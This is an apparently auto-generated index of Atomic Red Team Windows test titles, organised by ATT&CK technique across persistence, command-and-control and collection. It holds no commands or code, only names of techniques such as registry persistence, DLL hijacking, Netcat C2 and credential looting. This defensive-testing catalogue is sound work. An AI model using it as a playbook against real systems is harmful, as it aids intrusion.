- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
- Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
- Atomic Test #3: Persistent Code Execution Via Word Add-in File (WLL) [windows]
- Atomic Test #4: Persistent Code Execution Via Excel VBA Add-in File (XLAM) [windows]
- Atomic Test #5: Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- [T1505.005 Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md)
- Atomic Test #1: Simulate Patching termsrv.dll [windows]
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- Atomic Test #10: Domain Password Policy Check: Short Password [windows]
- Atomic Test #11: Domain Password Policy Check: No Number in Password [windows]
- Atomic Test #12: Domain Password Policy Check: No Special Character in Password [windows]
- Atomic Test #13: Domain Password Policy Check: No Uppercase Character in Password [windows]
- Atomic Test #14: Domain Password Policy Check: No Lowercase Character in Password [windows]
- Atomic Test #15: Domain Password Policy Check: Only Two Character Classes [windows]
- Atomic Test #16: Domain Password Policy Check: Common Password Use [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.004 IIS Components](../../T1505.004/T1505.004.md)
- Atomic Test #1: Install IIS Module using AppCmd.exe [windows]
- Atomic Test #2: Install IIS Module using PowerShell Cmdlet New-WebGlobalModule [windows]
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1209 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1084 Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- [T1137.002 Office Application Startup: Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence (HKCU) [windows]
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- Atomic Test #11: MSP360 Connect Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #5: Windows Screencapture [windows]
- Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1123 Audio Capture](../../T1123/T1123.md)
- Atomic Test #1: using device audio capture commandlet [windows]
- Atomic Test #2: Registry artefact when application use microphone [windows]
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
- Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
- [T1119 Automated Collection](../../T1119/T1119.md)
- Atomic Test #1: Automated Collection Command Prompt [windows]
- Atomic Test #2: Automated Collection PowerShell [windows]
- Atomic Test #3: Recon information for export with PowerShell [windows]
- Atomic Test #4: Recon information for export with Command Prompt [windows]
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560 Archive Collected Data](../../T1560/T1560.md)
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md)
- Atomic Test #1: LLMNR Poisoning with Inveigh (PowerShell) [windows]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1125 Video Capture](../../T1125/T1125.md)
- Atomic Test #1: Registry artefact when application use webcam [windows]
